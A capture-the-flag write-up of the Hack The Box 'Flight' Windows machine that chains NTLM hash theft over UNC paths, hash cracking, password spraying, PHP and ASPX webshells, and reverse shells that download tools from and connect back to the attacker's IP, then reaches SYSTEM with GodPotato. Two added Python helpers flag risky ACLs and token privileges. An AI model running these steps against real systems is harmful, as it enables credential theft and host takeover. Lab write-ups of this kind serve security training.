Flight is a Hard Windows machine from HTB created by Geiseric. It starts with a file-inclusion parameter on the school site that accepts a UNC path, which lets me capture an NTLMv2 hash for svc_apache. That hash cracks, and spraying the password gets a hit on a different domain user. This user has write access to a share, so I'll use ntlm_theft to generate a desktop.ini that lets me capture a NetNTLMv2 hash for another user. Cracking that one gives me credentials for a user who can write to the share backing the website, so I drop a PHP webshell on the site and get a shell as svc_apache. I then use RunasCs.exe to get a shell as C.Bum, a user I already have credentials for. That user has write access to an internal website running on IIS, so I drop an .aspx webshell there and get a shell as defaultapppool. That account has SeImpersonatePrivilege, which I abuse with GodPotato.exe to get SYSTEM.
獣 ~/htb/Flight/scans/tcp ➜ nmap -sCV --top-ports 10000 -T4 -vvvv 10.10.11.187 -oA flight
# Nmap 7.94SVN scan initiated Wed Oct 30 22:23:07 2024 as: /usr/lib/nmap/nmap -sCV --top-ports 10000 -T4 -vvvv -oA flight 10.10.11.187
Nmap scan report for 10.10.11.187
Host is up, received echo-reply ttl 127 (0.091s latency).
Scanned at 2024-10-30 22:23:07 EDT for 77s
Not shown: 8355 filtered tcp ports (no-response)
PORT     STATE SERVICE       REASON          VERSION
53/tcp   open  domain        syn-ack ttl 127 Simple DNS Plus
80/tcp   open  http          syn-ack ttl 127 Apache httpd 2.4.52 ((Win64) OpenSSL/1.1.1m PHP/8.1.1)
|_http-title: g0 Aviation
| http-methods:
|   Supported Methods: OPTIONS HEAD GET POST TRACE
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.1.1
88/tcp   open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2024-10-31 09:23:33Z)
135/tcp  open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp  open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: flight.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds? syn-ack ttl 127
464/tcp  open  kpasswd5?     syn-ack ttl 127
593/tcp  open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped    syn-ack ttl 127
3268/tcp open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: flight.htb0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped    syn-ack ttl 127
9389/tcp open  mc-nmf        syn-ack ttl 127 .NET Message Framing
Service Info: Host: G0; OS: Windows; CPE: cpe:/o:microsoft:windows

Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Oct 30 22:24:24 2024 -- 1 IP address (1 host up) scanned in 77.29 seconds
All the usual ports for a domain controller are open (DNS, Kerberos, LDAP, SMB, RPC), but 80/tcp (HTTP) is open too, so I'll start there for a foothold.
Recon
80 - HTTP
Going to the site, I am presented with a site for planning flights:
I can see a domain name in the bottom left of the page:
Copyright 2022 flight.htb - All Rights Reserved
I’ll add this to my /etc/hosts file and I’ll look for subdomains:
=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000000624:   200        90 L     412 W      3996 Ch     "school"
I get one result, school.flight.htb. I’ll add this to my /etc/hosts file:
10.10.11.187 school.flight.htb flight.htb
I’ll now visit http://school.flight.htb:
Going to any of the pages such as About Us puts a param in the URL:
The LFI doesn't get me much on its own, since I can't read anything sensitive with it. A common next step on a Windows host is to point the include at a UNC path on my own machine: the web server then connects to my SMB listener and authenticates as the account Apache runs under, which leaks that account's NetNTLMv2 hash. I'd usually use a payload like this:
\\<tun0>\share
But backslashes are blocked by the filter. Windows accepts forward slashes in a UNC path just as well, so //<tun0>/share gets through the filter and my SMB listener receives the authentication attempt:
獣 ~/htb/Flight/enumeration ➜ hashcat -a 0 svc_apache.hash /usr/share/wordlists/rockyou.txt --show
Hash-mode was not specified with -m. Attempting to auto-detect hash mode.
The following mode was auto-detected as the only one matching your input hash:

5600 | NetNTLMv2 | Network Protocol

NOTE: Auto-detect is best effort. The correct hash-mode is NOT guaranteed!
Do NOT report auto-detect issues unless you are certain of the hash type.
After spraying the cracked svc_apache password across the domain users I get a hit on S.Moon, and the nxc share enumeration shows that S.Moon can write to a share named Shared:
獣 ~/htb/Flight/enumeration ➜ impacket-smbclient flight.htb/S.Moon@G0.flight.htb
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

Password:
Type help for list of commands
# use Shared
# put test.txt
[-] SMB SessionError: code: 0xc0000022 - STATUS_ACCESS_DENIED - {Access Denied} A process has requested access to an object but has not been granted those access rights.
The put of test.txt is denied even though the share is listed as writable, so this is probably a restriction on file type rather than on the share itself. After trying a few extensions I find that .ini files are accepted:
Password:
Type help for list of commands
# use Shared
# put test.ini
# ls
drw-rw-rw-          0  Thu Oct 31 06:10:56 2024 .
drw-rw-rw-          0  Thu Oct 31 06:10:56 2024 ..
-rw-rw-rw-          6  Thu Oct 31 06:10:56 2024 test.ini
A desktop.ini whose IconResource points at a UNC path makes Explorer fetch the icon over SMB whenever someone browses the folder, which leaks that user's NetNTLMv2 hash. I'll use ntlm_theft to generate a desktop.ini that pulls its icon from my SMB server and drop it in the share:
I’ll crack this hash with hashcat just like last time:
獣 ~/Documents/hexo ➜ hashcat -a 0 cbum.hash /usr/share/wordlists/rockyou.txt --show
Hash-mode was not specified with -m. Attempting to auto-detect hash mode.
The following mode was auto-detected as the only one matching your input hash:

5600 | NetNTLMv2 | Network Protocol

NOTE: Auto-detect is best effort. The correct hash-mode is NOT guaranteed!
Do NOT report auto-detect issues unless you are certain of the hash type.
C.Bum can write to a share named Web, so I'll check what's in there:
獣 ~/htb/Flight/enumeration ➜ impacket-smbclient flight.htb/C.Bum@G0.flight.htb
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

Password:
Type help for list of commands
# use Web
# ls
drw-rw-rw-          0  Thu Oct 31 06:18:27 2024 .
drw-rw-rw-          0  Thu Oct 31 06:18:27 2024 ..
drw-rw-rw-          0  Thu Oct 31 06:17:00 2024 flight.htb
drw-rw-rw-          0  Thu Oct 31 06:17:00 2024 school.flight.htb
This looks like the document root for both websites. I'll drop a test.txt into school.flight.htb and see whether the web server serves it:
獣 ~/htb/Flight/enumeration ➜ impacket-smbclient flight.htb/C.Bum@G0.flight.htb
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

Password:
Type help for list of commands
# use Web
# cd school.flight.htb
# put test.txt
# ls
drw-rw-rw-          0  Thu Oct 31 06:19:08 2024 .
drw-rw-rw-          0  Thu Oct 31 06:19:08 2024 ..
-rw-rw-rw-       1689  Mon Oct 24 23:54:45 2022 about.html
-rw-rw-rw-       3618  Mon Oct 24 23:53:59 2022 blog.html
-rw-rw-rw-       2683  Mon Oct 24 23:56:58 2022 home.html
drw-rw-rw-          0  Thu Oct 31 06:17:00 2024 images
-rw-rw-rw-       2092  Thu Oct 27 03:59:25 2022 index.php
-rw-rw-rw-        179  Thu Oct 27 03:55:16 2022 lfi.html
drw-rw-rw-          0  Thu Oct 31 06:17:00 2024 styles
-rw-rw-rw-          6  Thu Oct 31 06:20:04 2024 test.txt
I’ll check if that file is there on the website:
The file was written successfully and is served by the site. Since the site runs PHP, I'll drop p0wny, a PHP webshell, into the same directory:
# put p0wny.php
# ls
drw-rw-rw-          0  Thu Oct 31 06:23:47 2024 .
drw-rw-rw-          0  Thu Oct 31 06:23:47 2024 ..
-rw-rw-rw-       1689  Mon Oct 24 23:54:45 2022 about.html
-rw-rw-rw-       3618  Mon Oct 24 23:53:59 2022 blog.html
-rw-rw-rw-       2683  Mon Oct 24 23:56:58 2022 home.html
drw-rw-rw-          0  Thu Oct 31 06:22:00 2024 images
-rw-rw-rw-       2092  Thu Oct 27 03:59:25 2022 index.php
-rw-rw-rw-        179  Thu Oct 27 03:55:16 2022 lfi.html
-rw-rw-rw-      20321  Thu Oct 31 06:23:47 2024 p0wny.php
drw-rw-rw-          0  Thu Oct 31 06:22:00 2024 styles
I’ll try to visit the webshell on the site to check if it was put there successfully:
Getting a Reverse Shell
I’ll get a reverse shell using nc64.exe, first I’ll download it:
svc_apache@g0:C:\xampp\htdocs\school.flight.htb# cd \programdata
svc_apache@g0:C:\ProgramData# curl http://10.10.14.10/nc64.exe -o nc64.exe
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed

獣 ~/htb/Flight/enumeration ➜ rlwrap nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.10] from (UNKNOWN) [10.10.11.187] 49942
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

User Name         SID
================= ==============================================
flight\svc_apache S-1-5-21-4078382237-1492182817-2568127209-1612

GROUP INFORMATION
-----------------

Group Name                                  Type             SID          Attributes
=========================================== ================ ============ ==================================================
Everyone                                    Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                               Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access  Alias            S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE                        Well-known group S-1-5-6      Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                               Well-known group S-1-2-1      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users            Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization              Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
LOCAL                                       Well-known group S-1-2-0      Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity  Well-known group S-1-18-1     Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level        Label            S-1-16-12288

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== ========
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeCreateGlobalPrivilege       Create global objects          Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled

USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.
No interesting privileges or groups, so I'll look around C:\:
PS C:\> ls
ls

    Directory: C:\

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----        10/31/2024   3:32 AM                inetpub
d-----          6/7/2022   6:39 AM                PerfLogs
d-r---        10/21/2022  11:49 AM                Program Files
d-----         7/20/2021  12:23 PM                Program Files (x86)
d-----        10/31/2024   3:18 AM                Shared
d-----         9/22/2022  12:28 PM                StorageReports
d-r---         9/22/2022   1:16 PM                Users
d-----        10/21/2022  11:52 AM                Windows
d-----         9/22/2022   1:16 PM                xampp
C:\xampp is expected given the two Apache sites I saw earlier, but C:\inetpub is also present, which means IIS is installed as well. I'll check that out:
PS C:\> cd inetpub
cd inetpub
PS C:\inetpub> ls
ls

    Directory: C:\inetpub

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----         9/22/2022  12:24 PM                custerr
d-----        10/31/2024   3:32 AM                development
d-----         9/22/2022   1:08 PM                history
d-----         9/22/2022  12:32 PM                logs
d-----         9/22/2022  12:24 PM                temp
d-----         9/22/2022  12:28 PM                wwwroot
wwwroot is the default IIS directory, but development isn't, so I'll look at that:
It looks like another site. I'll use icacls to see who can write to the directory:
PS C:\inetpub\development> cd ..
cd ..
PS C:\inetpub> icacls development
icacls development
development flight\C.Bum:(OI)(CI)(W)
            NT SERVICE\TrustedInstaller:(I)(F)
            NT SERVICE\TrustedInstaller:(I)(OI)(CI)(IO)(F)
            NT AUTHORITY\SYSTEM:(I)(F)
            NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
            BUILTIN\Administrators:(I)(F)
            BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
            BUILTIN\Users:(I)(RX)
            BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
            CREATOR OWNER:(I)(OI)(CI)(IO)(F)
Very interesting: C.Bum, whose credentials I already have, holds write (W) access over this directory and its contents (OI)(CI), and the ACE has no (I) flag, so it was granted explicitly rather than inherited from C:\inetpub. Since I have his password, I can get a shell as C.Bum via RunasCs.exe:
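Reading that icacls output by eye works for one directory, but the thing I actually care about is any ACE that grants write-class rights to a principal other than SYSTEM, Administrators, TrustedInstaller or CREATOR OWNER, and especially one without the (I) inherited flag, because that was granted on purpose. The following Python is an added example (my own, not from the original post) that parses icacls text and flags exactly that. The sample is the development listing above embedded as a string; the TRUSTED and WRITE_RIGHTS sets are my own choices, so extend them for your environment.

```python
import re
from typing import Dict, List

# The icacls output for C:\inetpub\development from this writeup, embedded as a constant.
ICACLS_SAMPLE = r"""development flight\C.Bum:(OI)(CI)(W)
            NT SERVICE\TrustedInstaller:(I)(F)
            NT SERVICE\TrustedInstaller:(I)(OI)(CI)(IO)(F)
            NT AUTHORITY\SYSTEM:(I)(F)
            NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
            BUILTIN\Administrators:(I)(F)
            BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
            BUILTIN\Users:(I)(RX)
            BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
            CREATOR OWNER:(I)(OI)(CI)(IO)(F)

Successfully processed 1 files; Failed processing 0 files
"""

INHERIT_FLAGS = {"I", "OI", "CI", "IO", "NP"}
# Simple and specific rights that let a principal create or change content under the directory.
WRITE_RIGHTS = {"F", "M", "W", "D", "GA", "GW", "WD", "AD", "WA", "WEA", "DC", "WDAC", "WO"}
# Principals expected to hold full control under C:\inetpub; anyone else with write is a finding.
TRUSTED = {r"NT AUTHORITY\SYSTEM", r"BUILTIN\Administrators", r"NT SERVICE\TrustedInstaller", "CREATOR OWNER"}

# principal:(FLAG)(FLAG)... ; the principal may contain spaces and backslashes but never parentheses.
ACE_RE = re.compile(r"^(?P<principal>[^()]+?):(?P<flags>(?:\([A-Z,]+\))+)$")


def parse_icacls(output: str, path: str) -> List[Dict[str, object]]:
    """Turn icacls text into one dict per ACE; `path` is the name icacls prefixes to the first ACE."""
    aces = []
    for raw in output.splitlines():
        line = raw.strip()
        if line.startswith(path + " "):
            line = line[len(path) + 1:].strip()
        m = ACE_RE.match(line)
        if not m:
            continue  # blank line or the "Successfully processed" trailer
        groups = re.findall(r"\(([A-Z,]+)\)", m.group("flags"))
        rights = [r for g in groups if g not in INHERIT_FLAGS for r in g.split(",")]
        aces.append({
            "principal": m.group("principal"),
            "rights": rights,
            "inherited": "I" in groups,
            "inherit_only": "IO" in groups,
        })
    return aces


def untrusted_writers(output: str, path: str) -> List[Dict[str, object]]:
    """ACEs granting write-class rights to principals outside TRUSTED; explicit (non-inherited) ones matter most."""
    return [
        ace for ace in parse_icacls(output, path)
        if ace["principal"] not in TRUSTED and WRITE_RIGHTS & set(ace["rights"])
    ]


if __name__ == "__main__":
    for ace in untrusted_writers(ICACLS_SAMPLE, "development"):
        print(ace)
```

Run this over `icacls <dir>` output for every web root, service binary directory and scheduled-task working directory you find, and the explicit non-inherited write grants to ordinary users fall out immediately; here the only hit is flight\C.Bum with (W) and inherited=False, which is exactly the ACE the writeup goes on to abuse.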
PS C:\programdata> curl http://10.10.14.10/RunasCs.exe -o RunasCs.exe
curl http://10.10.14.10/RunasCs.exe -o RunasCs.exe
PS C:\programdata> .\RunasCs.exe
.\RunasCs.exe
[-] Not enough arguments. 3 Arguments required. Use --help for additional help.
I'll use C.Bum's creds to run powershell.exe, with -r pointing the new process's stdin/stdout/stderr at my listener:
PS C:\programdata> .\RunasCs.exe C.Bum Tikkycoll_431012284 -r 10.10.14.10:443 powershell.exe
.\RunasCs.exe C.Bum Tikkycoll_431012284 -r 10.10.14.10:443 powershell.exe
[*] Warning: The logon for user 'C.Bum' is limited. Use the flag combination --bypass-uac and --logon-type '8' to obtain a more privileged token.

[+] Running in session 0 with process function CreateProcessWithLogonW()
[+] Using Station\Desktop: Service-0x0-64120$\Default
[+] Async process 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' with pid 4304 created in background.
This works and I get a shell as C.Bum:
獣 ~/htb/Flight/enumeration ➜ rlwrap nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.10] from (UNKNOWN) [10.10.11.187] 49999
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
It's probably the listener on 8000, since the two XAMPP sites are on 80. That port didn't show up in my nmap scan, so it isn't reachable from outside and I need to forward it; I'll use chisel.exe. First I'll start the chisel server on my machine:
Now going to 127.0.0.1:8000 on my browser shows me the site:
And I can go to /shell.aspx for a webshell:
Keep in mind that there is a cleanup script, so the shell may get deleted; just upload it again if it disappears. I'll use it to get a proper reverse shell with nc64.exe again:
獣 ~/htb/Flight/enumeration ➜ rlwrap nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.10] from (UNKNOWN) [10.10.11.187] 50067
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

User Name                  SID
========================== =============================================================
iis apppool\defaultapppool S-1-5-82-3006700770-424185619-1745488364-794895919-4004696415

GROUP INFORMATION
-----------------

Group Name                                 Type             SID          Attributes
========================================== ================ ============ ==================================================
Mandatory Label\High Mandatory Level       Label            S-1-16-12288
Everyone                                   Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE                       Well-known group S-1-5-6      Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                              Well-known group S-1-2-1      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
BUILTIN\IIS_IUSRS                          Alias            S-1-5-32-568 Mandatory group, Enabled by default, Enabled group
LOCAL                                      Well-known group S-1-2-0      Mandatory group, Enabled by default, Enabled group

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeMachineAccountPrivilege     Add workstations to domain                Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled

USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.
Shell as SYSTEM
As I guessed, the app pool account has SeImpersonatePrivilege. That privilege lets a process impersonate any client that authenticates to it, and the Potato family abuses it by coercing a SYSTEM-level component into authenticating to a local endpoint the attacker controls, then impersonating the resulting token. I'll use GodPotato.exe to get a shell as SYSTEM:
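The whoami /all output is where SeImpersonatePrivilege shows up, but it is easy to skim past one privilege in a long table. As an added example (not from the original post), this Python parses the privilege table printed by whoami /priv or /all and lists the held privileges that have a known escalation route, using the two tables from this writeup (svc_apache and defaultapppool) as embedded samples; the DANGEROUS mapping is my own shortlist. A privilege shown as Disabled is still held by the token and can be enabled by the process with AdjustTokenPrivileges, which is why SeAssignPrimaryTokenPrivilege is reported as well.

```python
import re
from typing import Dict, List

# Privileges with a well-known route to SYSTEM or to arbitrary file/process control.
# State is reported but does not lower the risk: a Disabled privilege is still in the token.
DANGEROUS = {
    "SeImpersonatePrivilege": "impersonate a coerced SYSTEM token (GodPotato and friends)",
    "SeAssignPrimaryTokenPrivilege": "start a process with a stolen primary token (Potato variants)",
    "SeDebugPrivilege": "open and inject into any process, including SYSTEM ones",
    "SeBackupPrivilege": "read any file regardless of ACL (SAM, SYSTEM hive, NTDS.dit)",
    "SeRestorePrivilege": "write any file or registry key regardless of ACL",
    "SeTakeOwnershipPrivilege": "take ownership of any securable object",
    "SeLoadDriverPrivilege": "load a kernel driver",
    "SeTcbPrivilege": "act as part of the operating system",
    "SeCreateTokenPrivilege": "create arbitrary tokens",
    "SeManageVolumePrivilege": "raw volume access",
    "SeMachineAccountPrivilege": "add computer accounts to the domain (RBCD-style abuse)",
}

# One table row: name, free-text description, then Enabled/Disabled.
PRIV_RE = re.compile(r"^(Se\w+Privilege)\s+(.+?)\s+(Enabled|Disabled)$")

# The two privilege tables from this writeup, embedded as constructed samples.
SVC_APACHE = """\
Privilege Name                Description                    State
============================= ============================== ========
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeCreateGlobalPrivilege       Create global objects          Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
"""

DEFAULTAPPPOOL = """\
Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeMachineAccountPrivilege     Add workstations to domain                Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""


def parse_privs(whoami_output: str) -> Dict[str, str]:
    """Map privilege name -> state from the table whoami /priv (or /all) prints; other lines are ignored."""
    privs: Dict[str, str] = {}
    for line in whoami_output.splitlines():
        m = PRIV_RE.match(line.strip())
        if m:
            privs[m.group(1)] = m.group(3)
    return privs


def triage(whoami_output: str) -> List[Dict[str, str]]:
    """Return the held privileges that have a known escalation path, in table order."""
    return [
        {"privilege": name, "state": state, "why": DANGEROUS[name]}
        for name, state in parse_privs(whoami_output).items()
        if name in DANGEROUS
    ]


if __name__ == "__main__":
    print(triage(SVC_APACHE))  # nothing useful in the Apache service token
    for hit in triage(DEFAULTAPPPOOL):
        print(hit)
```

For the svc_apache token this returns nothing, which matches the writeup's "no interesting privs"; for defaultapppool it returns SeAssignPrimaryTokenPrivilege, SeMachineAccountPrivilege and SeImpersonatePrivilege, the last of which is the one GodPotato needs.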
I got a shell as SYSTEM! With that I can read the root flag:
PS C:\programdata> cd \users\administrator\desktop
cd \users\administrator\desktop
PS C:\users\administrator\desktop> ls
ls

    Directory: C:\users\administrator\desktop

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-ar---        10/31/2024   2:14 AM             34 root.txt
Flight was a lot of enumeration, but it was a fun and interesting machine. I really liked all the pivoting between users, and I liked that the author showcased RunasCs.exe, since I think it's an important tool to know.